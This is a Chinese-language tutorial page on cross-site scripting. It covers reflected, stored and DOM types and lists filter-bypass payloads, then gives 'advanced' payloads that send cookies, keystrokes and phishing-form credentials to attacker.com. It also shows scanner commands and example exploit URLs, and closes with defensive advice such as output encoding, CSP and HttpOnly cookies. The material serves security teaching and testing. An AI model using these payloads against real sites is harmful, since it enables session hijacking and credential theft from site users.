---
title: "XSS 跨站脚本攻击"
weight: 11
date: "2026-03-08T22:45:09+08:00"
lastmod: "2026-03-08T22:45:09+08:00"
---

## 漏洞概述

XSS（Cross-Site Scripting）跨站脚本攻击，攻击者通过在网页中注入恶意脚本，在用户浏览器端执行。

**OWASP Top 10**: A03:2021  
**危害等级**: ⭐⭐⭐⭐

---

## XSS 类型

### 1. 反射型 XSS (Reflected)

恶意脚本通过 URL 参数反射到页面执行。

```
# 示例 URL
http://target.com/search?q=<script>alert(1)</script>

# 后端代码 (不安全)
echo "搜索结果：" . $_GET['q'];
```

### 2. 存储型 XSS (Stored)

恶意脚本被存储到数据库，每次访问都执行。

```
# 示例：留言板
POST /comment
content=<script>alert(document.cookie)</script>

# 所有查看留言的用户都会执行
```

### 3. DOM 型 XSS

恶意脚本通过修改 DOM 执行，不经过服务端。

```javascript
// 不安全的 DOM 操作
var name = document.location.search.substring(1);
document.write("Hello " + name);

// 利用 URL
http://target.com/page.html?<script>alert(1)</script>
```

---

## Payload 大全

### 基础 Payload

```html
<script>alert(1)</script>
<script>alert(document.cookie)</script>
<img src=x onerror=alert(1)>
<img src=x onerror=alert(document.cookie)>
<svg onload=alert(1)>
<body onload=alert(1)>
<iframe src="javascript:alert(1)">
```

### 绕过引号过滤

```html
"><script>alert(1)</script>
'><script>alert(1)</script>
" onfocus="alert(1)" autofocus="
' onfocus='alert(1)' autofocus='
```

### 绕过标签过滤

```html
<img src=x onerror=alert(1)>
<svg/onload=alert(1)>
<body/onload=alert(1)>
<input onfocus=alert(1) autofocus>
```

### 绕过关键词过滤

```html
<!-- 大小写混合 -->
<ScRiPt>alert(1)</ScRiPt>

<!-- 双写绕过 -->
<scriptscript>alert(1)</scriptscript>

<!-- 编码绕过 -->
%3Cscript%3Ealert(1)%3C/script%3E
&#60;script&#62;alert(1)&#60;/script&#62;

<!-- Unicode 编码 -->
\u003cscript\u003ealert(1)\u003c/script\u003e
```

### 高级 Payload

```html
<!-- 窃取 Cookie -->
<script>document.location='http://attacker.com/steal?c='+document.cookie</script>

<!-- 键盘记录 -->
<script>
document.onkeypress = function(e) {
    fetch('http://attacker.com/log?key=' + e.key);
}
</script>

<!-- 钓鱼表单 -->
<script>
document.body.innerHTML = '<form action="http://attacker.com/steal">' +
    '<input name="username"><input name="password" type="password">' +
    '<input type="submit" value="Login"></form>';
</script>

<!-- 覆盖页面 -->
<script>document.write('<h1>网站维护中</h1>');</script>
```

---

## 工具检测

### XSStrike

```bash
# 检测 XSS
xsstrike -u "http://target.com/search?q=test"

# 深度扫描
xsstrike -u "http://target.com/search?q=test" --fuzzer --threads 10
```

### Dalfox

```bash
# 检测 XSS
dalfox url "http://target.com/search?q=test"

# 多参数检测
dalfox file urls.txt -o result.txt
```

### SQLMap (也支持 XSS)

```bash
# 检测 XSS
sqlmap -u "http://target.com/search?q=test" --batch --tamper=xss
```

---

## 实战案例

### 案例 1: 搜索框反射 XSS

```bash
# 检测
http://target.com/search?q=<script>alert(1)</script>

# 窃取 Cookie
http://target.com/search?q=<script>document.location='http://attacker.com/steal?c='+document.cookie</script>
```

### 案例 2: 留言板存储 XSS

```bash
# 发布恶意留言
POST /comment
Content: <img src=x onerror=alert(document.cookie)>

# 管理员查看时执行
```

### 案例 3: 个人资料 DOM XSS

```javascript
// 前端代码
var name = new URLSearchParams(window.location.search).get('name');
document.getElementById('greeting').innerHTML = 'Hello ' + name;

# 利用
http://target.com/profile?name=<img src=x onerror=alert(1)>
```

---

## 防御建议

1. **输出编码**
   ```php
   // PHP
   echo htmlspecialchars($input, ENT_QUOTES, 'UTF-8');
   ```

2. **输入验证**
   ```javascript
   // 白名单验证
   const allowedTags = ['b', 'i', 'u'];
   ```

3. **使用 CSP (Content Security Policy)**
   ```html
   <meta http-equiv="Content-Security-Policy" 
         content="default-src 'self'; script-src 'self'">
   ```

4. **设置 HttpOnly Cookie**
   ```php
   setcookie('session', $value, [
       'httponly' => true,
       'secure' => true,
       'samesite' => 'Strict'
   ]);
   ```

5. **使用前端框架**
   - React/Vue/Angular 默认防 XSS

---

## 参考链接

- [XSS Payloads](https://github.com/pgaijin66/XSS-Payloads)
- [PayloadsAllTheThings - XSS](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection)
- [HackTricks - XSS](https://book.hacktricks.wiki/pentesting-web/xss-cross-site-scripting)